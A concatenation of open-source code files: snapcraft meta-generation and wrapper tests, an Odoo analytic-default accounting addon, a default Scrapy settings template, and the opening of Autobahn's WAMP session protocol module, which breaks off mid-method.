'command': 'echo'
}
}
}
# Create metadata file
open('test-metadata-file', 'w').close()
class CreateMetadataFromSourceErrorsTestCase(
CreateMetadataFromSourceBaseTestCase):
def test_create_metadata_with_missing_parse_info(self):
del self.config_data['summary']
del self.config_data['parts']['test-part']['parse-info']
raised = self.assertRaises(
meta_errors.AdoptedPartNotParsingInfo,
self.generate_meta_yaml)
self.assertThat(raised.part, Equals('test-part'))
def test_create_metadata_with_wrong_adopt_info(self):
del self.config_data['summary']
self.config_data['adopt-info'] = 'wrong-part'
raised = self.assertRaises(
meta_errors.AdoptedPartMissingError, self.generate_meta_yaml)
self.assertThat(raised.part, Equals('wrong-part'))
def test_metadata_doesnt_overwrite_specified(self):
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
summary='extracted summary',
description='extracted description')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
y = self.generate_meta_yaml(build=True)
# Since both summary and description were specified, neither should be
# overwritten
self.assertThat(y['summary'], Equals(self.config_data['summary']))
self.assertThat(
y['description'], Equals(self.config_data['description']))
def test_metadata_with_unexisting_icon(self):
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
icon='test/extracted/unexistent/icon/path')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
# The meta generation should just ignore the dead path, and not fail.
self.generate_meta_yaml(build=True)
def test_metadata_satisfies_required_property(self):
del self.config_data['summary']
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
summary='extracted summary',
description='extracted description')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
y = self.generate_meta_yaml(build=True)
# Summary should come from the extracted metadata, while description
# should not.
self.assertThat(y['summary'], Equals('extracted summary'))
self.assertThat(
y['description'], Equals(self.config_data['description']))
def test_metadata_not_all_properties_satisfied(self):
del self.config_data['summary']
del self.config_data['description']
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
description='extracted description')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
# Assert that description has been satisfied by extracted metadata, but
# summary has not.
raised = self.assertRaises(
meta_errors.MissingSnapcraftYamlKeysError,
self.generate_meta_yaml, build=True)
self.assertThat(raised.keys, Equals("'summary'"))
class MetadataFromSourceWithIconFileTestCase(
CreateMetadataFromSourceBaseTestCase):
scenarios = testscenarios.multiply_scenarios(
(('setup/gui', dict(directory=os.path.join('setup', 'gui'))),
('snap/gui', dict(directory=os.path.join('snap', 'gui')))),
(('icon.png', dict(file_name='icon.png')),
('icon.svg', dict(file_name='icon.svg')))
)
def test_metadata_doesnt_overwrite_icon_file(self):
os.makedirs(self.directory)
icon_content = 'setup icon'
_create_file(
os.path.join(self.directory, self.file_name),
content=icon_content)
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
icon='test/extracted/unexistent/icon/path')
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
self.generate_meta_yaml(build=True)
expected_icon = os.path.join(self.meta_dir, 'gui', self.file_name)
self.assertThat(expected_icon, FileContains(icon_content))
class MetadataFromSourceWithDesktopFileTestCase(
CreateMetadataFromSourceBaseTestCase):
scenarios = (
('setup/gui', dict(directory=os.path.join('setup', 'gui'))),
('snap/gui', dict(directory=os.path.join('snap', 'gui')))
)
def test_metadata_doesnt_overwrite_desktop_file(self):
os.makedirs(self.directory)
desktop_content = 'setup desktop'
_create_file(
os.path.join(self.directory, 'test-app.desktop'),
content=desktop_content)
def _fake_extractor(file_path):
return extractors.ExtractedMetadata(
desktop_file_paths=[
'usr/share/applications/com.example.test/app.desktop'])
self.useFixture(fixture_setup.FakeMetadataExtractor(
'fake', _fake_extractor))
self.generate_meta_yaml(build=True)
expected_desktop = os.path.join(
self.meta_dir, 'gui', 'test-app.desktop')
self.assertThat(expected_desktop, FileContains(desktop_content))
class WriteSnapDirectoryTestCase(CreateBaseTestCase):
def test_write_snap_directory(self):
# Setup a snap directory containing a few things.
_create_file(os.path.join(self.snap_dir, 'snapcraft.yaml'))
_create_file(
os.path.join(self.snap_dir, 'hooks', 'test-hook'), executable=True)
# Now write the snap directory, and verify everything was migrated, as
# well as the hook making it into meta/.
self.generate_meta_yaml()
prime_snap_dir = os.path.join(self.prime_dir, 'snap')
self.assertThat(
os.path.join(prime_snap_dir, 'hooks', 'test-hook'), FileExists())
self.assertThat(
os.path.join(self.hooks_dir, 'test-hook'), FileExists())
# The hook should be empty, because the one in snap/hooks is empty, and
# no wrapper is generated (i.e. that hook is copied to both locations).
self.assertThat(
os.path.join(self.hooks_dir, 'test-hook'), FileContains(''))
def test_snap_hooks_overwrite_part_hooks(self):
# Setup a prime/snap directory containing a hook.
part_hook = os.path.join(self.prime_dir, 'snap', 'hooks', 'test-hook')
_create_file(part_hook, content='from part', executable=True)
# Setup a snap directory containing the same hook
snap_hook = os.path.join(self.snap_dir, 'hooks', 'test-hook')
_create_file(snap_hook, content='from snap', executable=True)
# Now write the snap directory, and verify that the snap hook overwrote
# the part hook in both prime/snap/hooks and prime/meta/hooks.
self.generate_meta_yaml()
prime_snap_dir = os.path.join(self.prime_dir, 'snap')
self.assertThat(
os.path.join(prime_snap_dir, 'hooks', 'test-hook'), FileExists())
self.assertThat(
os.path.join(self.hooks_dir, 'test-hook'), FileExists())
# Both hooks in snap/hooks and meta/hooks should contain 'from snap' as
# that one should have overwritten the other (and its wrapper).
self.assertThat(
os.path.join(self.prime_dir, 'snap', 'hooks', 'test-hook'),
FileContains('from snap'))
self.assertThat(
os.path.join(self.prime_dir, 'meta', 'hooks', 'test-hook'),
FileContains('from snap'))
def test_snap_hooks_not_executable_raises(self):
# Setup a snap directory containing a few things.
_create_file(os.path.join(self.snap_dir, 'snapcraft.yaml'))
_create_file(os.path.join(self.snap_dir, 'hooks', 'test-hook'))
# Now write the snap directory. This process should fail as the hook
# isn't executable.
with testtools.ExpectedException(meta_errors.CommandError,
"hook 'test-hook' is not executable"):
self.generate_meta_yaml()
class GenerateHookWrappersTestCase(CreateBaseTestCase):
def test_generate_hook_wrappers(self):
# Set up the prime directory to contain a few hooks in snap/hooks
snap_hooks_dir = os.path.join(self.prime_dir, 'snap', 'hooks')
hook1_path = os.path.join(snap_hooks_dir, 'test-hook1')
hook2_path = os.path.join(snap_hooks_dir, 'test-hook2')
for path in (hook1_path, hook2_path):
_create_file(path, executable=True)
# Now generate hook wrappers, and verify that they're correct
self.generate_meta_yaml()
for hook in ('test-hook1', 'test-hook2'):
hook_path = os.path.join(self.hooks_dir, hook)
self.assertThat(hook_path, FileExists())
self.assertThat(hook_path, unit.IsExecutable())
# The hook in meta/hooks should exec the one in snap/hooks, as it's
# a wrapper generated by snapcraft.
self.assertThat(
hook_path, FileContains(matcher=Contains(
'exec "$SNAP/snap/hooks/{}"'.format(hook))))
def test_generate_hook_wrappers_not_executable_raises(self):
# Set up the prime directory to contain a hook in snap/hooks that is
# not executable.
snap_hooks_dir = os.path.join(self.prime_dir, 'snap', 'hooks')
_create_file(os.path.join(snap_hooks_dir, 'test-hook'))
# Now attempt to generate hook wrappers. This should fail, as the hook
# itself is not executable.
with testtools.ExpectedException(meta_errors.CommandError,
"hook 'test-hook' is not executable"):
self.generate_meta_yaml()
class CreateWithConfinementTestCase(CreateBaseTestCase):
scenarios = [(confinement, dict(confinement=confinement)) for
confinement in ['strict', 'devmode', 'classic']]
def test_create_meta_with_confinement(self):
self.config_data['confinement'] = self.confinement
y = self.generate_meta_yaml()
self.assertTrue(
'confinement' in y,
'Expected "confinement" property to be in snap.yaml')
self.assertThat(y['confinement'], Equals(self.confinement))
class EnsureFilePathsTestCase(CreateBaseTestCase):
scenarios = [
('desktop', dict(
filepath='usr/share/desktop/desktop.desktop',
content='[Desktop Entry]\nExec=app2.exe\nIcon=/usr/share/app2.png',
key='desktop')),
('completer', dict(
filepath='usr/share/completions/complete.sh',
content='#/bin/bash\n',
key='completer')),
]
def test_file_path_entry(self):
self.config_data['apps'] = {
'app': {
'command': 'echo "hello"',
self.key: self.filepath,
}
}
_create_file(os.path.join('prime', self.filepath),
content=self.content)
# If the path exists this should not fail
self.generate_meta_yaml()
class EnsureFilePathsTestCaseFails(CreateBaseTestCase):
scenarios = [
('desktop', dict(
filepath='usr/share/desktop/desktop.desktop',
key='desktop')),
('completer', dict(
filepath='usr/share/completions/complete.sh',
key='completer')),
]
def test_file_path_entry(self):
self.config_data['apps'] = {
'app': {
'command': 'echo "hello"',
self.key: self.filepath,
}
}
self.assertRaises(
errors.SnapcraftPathEntryError, self.generate_meta_yaml)
class CreateWithGradeTestCase(CreateBaseTestCase):
scenarios = [(grade, dict(grade=grade)) for
grade in ['stable', 'devel']]
def test_create_meta_with_grade(self):
self.config_data['grade'] = self.grade
y = self.generate_meta_yaml()
self.assertTrue(
'grade' in y,
'Expected "grade" property to be in snap.yaml')
self.assertThat(y['grade'], Equals(self.grade))
# TODO this needs more tests.
class WrapExeTestCase(unit.TestCase):
def setUp(self):
super().setUp()
# TODO move to use outer interface
self.packager = _snap_packaging._SnapPackaging(
{'confinement': 'devmode'},
ProjectOptions(),
'dummy'
)
self.packager._is_host_compatible_with_base = True
@patch('snapcraft.internal.common.assemble_env')
def test_wrap_exe_must_write_wrapper(self, mock_assemble_env):
mock_assemble_env.return_value = """\
PATH={0}/part1/install/usr/bin:{0}/part1/install/bin
""".format(self.parts_dir)
relative_exe_path = 'test_relexepath'
_create_file(os.path.join(self.prime_dir, relative_exe_path))
# Check that the wrapper is created even if there is already a file
# with the same name.
_create_file(os.path.join(self.prime_dir, 'test_relexepath.wrapper'))
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'PATH=$SNAP/usr/bin:$SNAP/bin\n\n'
'export LD_LIBRARY_PATH=$SNAP_LIBRARY_PATH:'
'$LD_LIBRARY_PATH\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
@patch('snapcraft.internal.common.assemble_env')
def test_empty_wrapper_if_not_on_compatible_host_for_target_base(
self, mock_assemble_env):
self.packager._is_host_compatible_with_base = False
mock_assemble_env.return_value = """\
PATH={0}/part1/install/usr/bin:{0}/part1/install/bin
""".format(self.parts_dir)
relative_exe_path = 'test_relexepath'
_create_file(os.path.join(self.prime_dir, relative_exe_path))
# Check that the wrapper is created even if there is already a file
# with the same name.
_create_file(os.path.join(self.prime_dir, 'test_relexepath.wrapper'))
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
@patch('snapcraft.internal.common.assemble_env')
def test_wrap_exe_writes_wrapper_with_basename(self, mock_assemble_env):
mock_assemble_env.return_value = """\
PATH={0}/part1/install/usr/bin:{0}/part1/install/bin
""".format(self.parts_dir)
relative_exe_path = 'test_relexepath'
_create_file(os.path.join(self.prime_dir, relative_exe_path))
relative_wrapper_path = self.packager._wrap_exe(
relative_exe_path, basename='new-name')
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
self.assertThat(relative_wrapper_path, Equals('new-name.wrapper'))
expected = ('#!/bin/sh\n'
'PATH=$SNAP/usr/bin:$SNAP/bin\n\n'
'export LD_LIBRARY_PATH=$SNAP_LIBRARY_PATH:'
'$LD_LIBRARY_PATH\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
def test_snap_shebangs_extracted(self):
"""Shebangs pointing to the snap's install dir get extracted.
If the exe has a shebang that points to the snap's install dir,
the wrapper script will execute it directly rather than relying
on the shebang.
The shebang needs to be an absolute path, and we don't know
in which directory the snap will be installed. Executing
it in the wrapper script allows us to use the $SNAP environment
variable.
"""
relative_exe_path = 'test_relexepath'
shebang_path = os.path.join(
self.parts_dir, 'testsnap', 'install', 'snap_exe')
exe_contents = '#!{}\n'.format(shebang_path)
_create_file(os.path.join(self.prime_dir, relative_exe_path),
content=exe_contents)
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = (
'#!/bin/sh\n'
'exec "$SNAP/snap_exe" "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
# The shebang wasn't changed, since we don't know what the
# path will be on the installed system.
self.assertThat(os.path.join(self.prime_dir, relative_exe_path),
FileContains(exe_contents))
def test_non_snap_shebangs_ignored(self):
"""Shebangs not pointing to the snap's install dir are ignored.
If the shebang points to a system executable, there's no need to
interfere.
"""
relative_exe_path = 'test_relexepath'
exe_contents = '#!/bin/bash\necho hello\n'
_create_file(os.path.join(self.prime_dir, relative_exe_path),
content=exe_contents)
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
self.assertThat(os.path.join(self.prime_dir, relative_exe_path),
FileContains(exe_contents))
def test_non_shebang_binaries_ignored(self):
"""Native binaries are ignored.
If the executable is a native binary, and thus doesn't have a
shebang, it's ignored.
"""
relative_exe_path = 'test_relexepath'
# Choose a content which can't be decoded with utf-8, to make
# sure no decoding errors happen.
exe_contents = b'\xf0\xf1'
path = os.path.join(self.prime_dir, relative_exe_path)
_create_file(path, content=exe_contents)
relative_wrapper_path = self.packager._wrap_exe(relative_exe_path)
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'exec "$SNAP/test_relexepath" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
with open(path, 'rb') as exe:
self.assertThat(exe.read(), Equals(exe_contents))
@patch('snapcraft.internal.common.run_output')
def test_exe_is_in_path(self, run_mock):
app_path = os.path.join(self.prime_dir, 'bin', 'app1')
_create_file(app_path)
relative_wrapper_path = self.packager._wrap_exe('app1')
wrapper_path = os.path.join(self.prime_dir, relative_wrapper_path)
expected = ('#!/bin/sh\n'
'exec "app1" "$@"\n')
self.assertThat(wrapper_path, FileContains(expected))
def test_command_does_not_exist(self):
common.env = ['PATH={}/bin:$PATH'.format(self.prime_dir)]
apps = {'app1': {'command': 'command-does-not-exist'}}
raised = self.assertRaises(
errors.InvalidAppCommandError,
self.packager._wrap_apps, apps)
self.assertThat(raised.command, Equals('command-does-not-exist'))
self.assertThat(raised.app, Equals('app1'))
def test_command_is_not_executable(self):
common.env = ['PATH={}/bin:$PATH'.format(self.prime_dir)]
apps = {'app1': {'command': 'command-not-executable'}}
cmd_path = os.path.join(self.prime_dir, 'bin', apps['app1']['command'])
_create_file(cmd_path)
raised = self.assertRaises(
errors.InvalidAppCommandError,
self.packager._wrap_apps, apps)
self.assertThat(raised.command, Equals('command-not-executable'))
self.assertThat(raised.app, Equals('app1'))
def test_command_found(self):
common.env = ['PATH={}/bin:$PATH'.format(self.prime_dir)]
apps = {'app1': {'command': 'command-executable'}}
cmd_path = os.path.join(self.prime_dir, 'bin', apps['app1']['command'])
_create_file(cmd_path, executable=True)
wrapped_apps = self.packager._wrap_apps(apps)
self.assertThat(wrapped_apps,
Equals({'app1': {'command': 'command-app1.wrapper'}}))
def _create_file(path, *, content='', executable=False):
basepath = os.path.dirname(path)
if basepath:
os.makedirs(basepath, exist_ok=True)
mode = 'wb' if type(content) == bytes else 'w'
with open(path, mode) as f:
f.write(content)
if executable:
os.chmod(path, 0o755)
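# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original test module): how the
# _create_file() helper above is typically driven when preparing a prime
# directory for a test. The paths and contents below are hypothetical.
# ---------------------------------------------------------------------------


def _example_prime_layout(prime_dir):
    # an executable hook that meta generation should accept and wrap
    _create_file(os.path.join(prime_dir, 'snap', 'hooks', 'configure'),
                 content='#!/bin/sh\n', executable=True)
    # an executable app command that _wrap_exe() should generate a wrapper for
    _create_file(os.path.join(prime_dir, 'bin', 'app'),
                 content='#!/bin/sh\n', executable=True)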
|
gpl-3.0
|
numerigraphe/odoo
|
addons/account_analytic_default/account_analytic_default.py
|
256
|
8118
|
# -*- coding: utf-8 -*-
###############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_analytic_default(osv.osv):
_name = "account.analytic.default"
_description = "Analytic Distribution"
_rec_name = "analytic_id"
_order = "sequence"
_columns = {
'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of analytic distributions"),
'analytic_id': fields.many2one('account.analytic.account', 'Analytic Account'),
'product_id': fields.many2one('product.product', 'Product', ondelete='cascade', help="Select a product which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this product, it will automatically take this as an analytic account)"),
'partner_id': fields.many2one('res.partner', 'Partner', ondelete='cascade', help="Select a partner which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this partner, it will automatically take this as an analytic account)"),
'user_id': fields.many2one('res.users', 'User', ondelete='cascade', help="Select a user which will use analytic account specified in analytic default."),
'company_id': fields.many2one('res.company', 'Company', ondelete='cascade', help="Select a company which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this company, it will automatically take this as an analytic account)"),
'date_start': fields.date('Start Date', help="Default start date for this Analytic Account."),
'date_stop': fields.date('End Date', help="Default end date for this Analytic Account."),
}
def account_get(self, cr, uid, product_id=None, partner_id=None, user_id=None, date=None, company_id=None, context=None):
domain = []
if product_id:
domain += ['|', ('product_id', '=', product_id)]
domain += [('product_id', '=', False)]
if partner_id:
domain += ['|', ('partner_id', '=', partner_id)]
domain += [('partner_id', '=', False)]
if company_id:
domain += ['|', ('company_id', '=', company_id)]
domain += [('company_id', '=', False)]
if user_id:
domain += ['|', ('user_id', '=', user_id)]
domain += [('user_id', '=', False)]
if date:
domain += ['|', ('date_start', '<=', date), ('date_start', '=', False)]
domain += ['|', ('date_stop', '>=', date), ('date_stop', '=', False)]
best_index = -1
res = False
for rec in self.browse(cr, uid, self.search(cr, uid, domain, context=context), context=context):
index = 0
if rec.product_id: index += 1
if rec.partner_id: index += 1
if rec.company_id: index += 1
if rec.user_id: index += 1
if rec.date_start: index += 1
if rec.date_stop: index += 1
if index > best_index:
res = rec
best_index = index
return res
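# Hedged illustration (not part of the original addon): the specificity
# scoring used by account_get() above, extracted as a standalone helper.
# The rule with the most matching criteria set wins; the helper name is
# hypothetical.
def _example_specificity_score(rec):
    score = 0
    # one point per criterion defined on the analytic default rule
    for field in ('product_id', 'partner_id', 'company_id', 'user_id',
                  'date_start', 'date_stop'):
        if getattr(rec, field, False):
            score += 1
    return score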
class account_invoice_line(osv.osv):
_inherit = "account.invoice.line"
_description = "Invoice Line"
def product_id_change(self, cr, uid, ids, product, uom_id, qty=0, name='', type='out_invoice', partner_id=False, fposition_id=False, price_unit=False, currency_id=False, company_id=None, context=None):
res_prod = super(account_invoice_line, self).product_id_change(cr, uid, ids, product, uom_id, qty, name, type, partner_id, fposition_id, price_unit, currency_id=currency_id, company_id=company_id, context=context)
rec = self.pool.get('account.analytic.default').account_get(cr, uid, product, partner_id, uid, time.strftime('%Y-%m-%d'), company_id=company_id, context=context)
if rec:
res_prod['value'].update({'account_analytic_id': rec.analytic_id.id})
else:
res_prod['value'].update({'account_analytic_id': False})
return res_prod
class stock_picking(osv.osv):
_inherit = "stock.picking"
def _get_account_analytic_invoice(self, cursor, user, picking, move_line):
partner_id = picking.partner_id and picking.partner_id.id or False
rec = self.pool.get('account.analytic.default').account_get(cursor, user, move_line.product_id.id, partner_id, user, time.strftime('%Y-%m-%d'))
if rec:
return rec.analytic_id.id
return super(stock_picking, self)._get_account_analytic_invoice(cursor, user, picking, move_line)
class sale_order_line(osv.osv):
_inherit = "sale.order.line"
# Method overridden to set the analytic account by default on criterion match
def invoice_line_create(self, cr, uid, ids, context=None):
create_ids = super(sale_order_line, self).invoice_line_create(cr, uid, ids, context=context)
if not ids:
return create_ids
sale_line = self.browse(cr, uid, ids[0], context=context)
inv_line_obj = self.pool.get('account.invoice.line')
anal_def_obj = self.pool.get('account.analytic.default')
for line in inv_line_obj.browse(cr, uid, create_ids, context=context):
rec = anal_def_obj.account_get(cr, uid, line.product_id.id, sale_line.order_id.partner_id.id, sale_line.order_id.user_id.id, time.strftime('%Y-%m-%d'), context=context)
if rec:
inv_line_obj.write(cr, uid, [line.id], {'account_analytic_id': rec.analytic_id.id}, context=context)
return create_ids
class product_product(osv.Model):
_inherit = 'product.product'
def _rules_count(self, cr, uid, ids, field_name, arg, context=None):
Analytic = self.pool['account.analytic.default']
return {
product_id: Analytic.search_count(cr, uid, [('product_id', '=', product_id)], context=context)
for product_id in ids
}
_columns = {
'rules_count': fields.function(_rules_count, string='# Analytic Rules', type='integer'),
}
class product_template(osv.Model):
_inherit = 'product.template'
def _rules_count(self, cr, uid, ids, field_name, arg, context=None):
Analytic = self.pool['account.analytic.default']
res = {}
for product_tmpl_id in self.browse(cr, uid, ids, context=context):
res[product_tmpl_id.id] = sum([p.rules_count for p in product_tmpl_id.product_variant_ids])
return res
_columns = {
'rules_count': fields.function(_rules_count, string='# Analytic Rules', type='integer'),
}
def action_view_rules(self, cr, uid, ids, context=None):
products = self._get_products(cr, uid, ids, context=context)
result = self._get_act_window_dict(cr, uid, 'account_analytic_default.action_product_default_list', context=context)
result['domain'] = "[('product_id','in',[" + ','.join(map(str, products)) + "])]"
# Remove the context so it does not filter on product_id using the template's active_id
result['context'] = "{}"
return result
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
amozie/amozie
|
studzie/scrapy_tutor/hello/hello/settings.py
|
1
|
3118
|
# -*- coding: utf-8 -*-
# Scrapy settings for hello project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'hello'
SPIDER_MODULES = ['hello.spiders']
NEWSPIDER_MODULE = 'hello.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'hello (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'hello.middlewares.HelloSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'hello.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'hello.pipelines.HelloPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
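# Example (not part of the generated template): a conservative configuration
# one might uncomment for polite crawling, using only settings already listed
# above. Values are illustrative.
#DOWNLOAD_DELAY = 1
#CONCURRENT_REQUESTS_PER_DOMAIN = 8
#AUTOTHROTTLE_ENABLED = True
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
#HTTPCACHE_ENABLED = True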
|
apache-2.0
|
meejah/AutobahnPython
|
autobahn/wamp/protocol.py
|
1
|
61912
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Tavendo GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
from __future__ import absolute_import
import six
import txaio
import inspect
from autobahn import wamp
from autobahn.util import IdGenerator, ObservableMixin
from autobahn.wamp import uri
from autobahn.wamp import message
from autobahn.wamp import types
from autobahn.wamp import role
from autobahn.wamp import exception
from autobahn.wamp.exception import ApplicationError, ProtocolError, SessionNotReady, SerializationError
from autobahn.wamp.interfaces import IApplicationSession # noqa
from autobahn.wamp.types import SessionDetails
from autobahn.wamp.cryptobox import EncryptedPayload
from autobahn.wamp.request import \
Publication, \
Subscription, \
Handler, \
Registration, \
Endpoint, \
PublishRequest, \
SubscribeRequest, \
UnsubscribeRequest, \
CallRequest, \
InvocationRequest, \
RegisterRequest, \
UnregisterRequest
def is_method_or_function(f):
return inspect.ismethod(f) or inspect.isfunction(f)
class BaseSession(ObservableMixin):
"""
WAMP session base class.
This class implements :class:`autobahn.wamp.interfaces.ISession`.
"""
def __init__(self):
"""
"""
self.set_valid_events(
valid_events=[
'join', # right before onJoin runs
'leave', # after onLeave has run
'ready', # after onJoin and all 'join' listeners have completed
'connect', # right before onConnect
'disconnect', # right after onDisconnect
]
)
# this is for marshalling traceback from exceptions thrown in user
# code within WAMP error messages (that is, when invoking remoted
# procedures)
self.traceback_app = False
# mapping of exception classes to WAMP error URIs
self._ecls_to_uri_pat = {}
# mapping of WAMP error URIs to exception classes
self._uri_to_ecls = {
ApplicationError.INVALID_PAYLOAD: SerializationError
}
# session authentication information
self._authid = None
self._authrole = None
self._authmethod = None
self._authprovider = None
# end-to-end encryption keyring
self._keyring = None
# generator for WAMP request IDs
self._request_id_gen = IdGenerator()
def define(self, exception, error=None):
"""
Implements :func:`autobahn.wamp.interfaces.ISession.define`
"""
if error is None:
assert(hasattr(exception, '_wampuris'))
self._ecls_to_uri_pat[exception] = exception._wampuris
self._uri_to_ecls[exception._wampuris[0].uri()] = exception
else:
assert(not hasattr(exception, '_wampuris'))
self._ecls_to_uri_pat[exception] = [uri.Pattern(six.u(error), uri.Pattern.URI_TARGET_HANDLER)]
self._uri_to_ecls[six.u(error)] = exception
def _message_from_exception(self, request_type, request, exc, tb=None, enc_algo=None):
"""
Create a WAMP error message from an exception.
:param request_type: The request type this WAMP error message is for.
:type request_type: int
:param request: The request ID this WAMP error message is for.
:type request: int
:param exc: The exception.
:type exc: Instance of :class:`Exception` or subclass thereof.
:param tb: Optional traceback. If present, it'll be included with the WAMP error message.
:type tb: list or None
"""
assert(enc_algo is None or enc_algo == message.PAYLOAD_ENC_CRYPTO_BOX)
args = None
if hasattr(exc, 'args'):
args = list(exc.args) # make sure tuples are made into lists
kwargs = None
if hasattr(exc, 'kwargs'):
kwargs = exc.kwargs
if tb:
if kwargs:
kwargs['traceback'] = tb
else:
kwargs = {'traceback': tb}
if isinstance(exc, exception.ApplicationError):
error = exc.error if type(exc.error) == six.text_type else six.u(exc.error)
else:
if exc.__class__ in self._ecls_to_uri_pat:
